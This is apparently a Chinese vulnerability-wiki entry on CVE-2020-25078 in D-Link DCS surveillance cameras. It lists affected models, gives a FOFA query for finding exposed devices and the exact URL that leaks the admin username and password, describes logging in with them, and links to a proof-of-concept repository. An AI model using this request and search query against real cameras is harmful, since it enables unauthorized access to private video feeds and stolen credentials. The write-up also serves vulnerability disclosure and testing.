D-Link DCS系列监控账号密码信息泄露漏洞 CVE-2020-25078.md

1.68 KB / 2021-07-04 06:01:08
    # D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078

## 漏洞描述

D-Link DCS系列监控 通过访问特定的URL得到账号密码信息，攻击者通过漏洞进入后台可以获取视频监控页面



## 漏洞影响

> [!NOTE]
>
> DCS-2530L
> DCS-2670L
> DCS-4603
> DCS-4622
> DCS-4701E
> DCS-4703E
> DCS-4705E
> DCS-4802E
> DCS-P703

## FOFA

> [!NOTE]
>
> app="D_Link-DCS-2530L"

## 漏洞复现

访问登录页面如下

![](http://wikioss.peiqi.tech/vuln/link-9.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

出现漏洞的 Url 为, 其中泄露了账号密码

```
http://xxx.xxx.xxx.xxx/config/getuser?index=0
```

![](http://wikioss.peiqi.tech/vuln/link-10.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

使用泄露的账号密码登陆系统

![](http://wikioss.peiqi.tech/vuln/link-11.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

## Goby & POC

> [!NOTE]
>
> 已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
>
> D_Link_DC_Disclosure_of_account_password_information

![](http://wikioss.peiqi.tech/vuln/link-13.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)